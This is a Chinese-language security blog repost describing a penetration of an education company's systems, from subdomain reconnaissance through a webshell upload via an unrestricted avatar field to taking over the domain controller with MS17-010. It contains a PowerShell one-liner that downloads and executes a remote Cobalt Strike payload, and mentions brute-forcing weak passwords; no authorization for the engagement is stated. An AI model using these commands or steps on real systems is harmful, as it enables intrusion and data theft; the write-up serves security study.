渗透实战!从外网直接打到内网全过程

admin 2022年6月4日12:39:34安全文章评论37 views970字阅读3分14秒阅读模式




一.

前言


这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路


二.

正文


目标:www.xxxx.com(一家教育机构)
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能

渗透实战!从外网直接打到内网全过程

进行了简单的信息搜集

子域名搜集

渗透实战!从外网直接打到内网全过程

fofa找资产

渗透实战!从外网直接打到内网全过程

一共七个资产。去重之后只有两个。

目录探测

渗透实战!从外网直接打到内网全过程

我尝试了暴力枚举,看有没有弱口令之类的,然而并没有

我又尝试了通过修改返回包来绕过登录界面

渗透实战!从外网直接打到内网全过程

还是不行,尝试注入无果

渗透实战!从外网直接打到内网全过程

不过我目录探测出了一处Spring信息泄露

渗透实战!从外网直接打到内网全过程

尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录

渗透实战!从外网直接打到内网全过程


后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。

渗透实战!从外网直接打到内网全过程

获取有些师傅到这一步就手机抓包电脑测了。

Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。

其中在一个公众号发现了小程序,可以进行注册。

看到了头像上传,尝试上传获取WebShell

渗透实战!从外网直接打到内网全过程

未做任何限制成功GetShell,上了冰蝎马,目录没权限访问

渗透实战!从外网直接打到内网全过程

然后上了大马

渗透实战!从外网直接打到内网全过程

渗透实战!从外网直接打到内网全过程

通过翻找文件发现数据库账号密码

渗透实战!从外网直接打到内网全过程

--内网渗透

直接通过powershell执行 cs上线

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"

渗透实战!从外网直接打到内网全过程

进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破

渗透实战!从外网直接打到内网全过程

登录爆破出来的服务器,发现多网卡且存在逻辑隔离。

渗透实战!从外网直接打到内网全过程

通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭

渗透实战!从外网直接打到内网全过程




三.

小结


在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!


转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html

整理:暗网黑客




【白帽子程序员】,一线网络安全和程序设计的交流平台

渗透实战!从外网直接打到内网全过程

回复“电子书”web渗透、CTF电子书;

回复“视频教程”获取渗透测试视频教程:

回复“CTF视频教程”获取CTF视频教程;  

回复“python视频教程”python教学视频;        



原文始发于微信公众号(白帽子程序员):渗透实战!从外网直接打到内网全过程

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月4日12:39:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  渗透实战!从外网直接打到内网全过程 http://cn-sec.com/archives/1085115.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: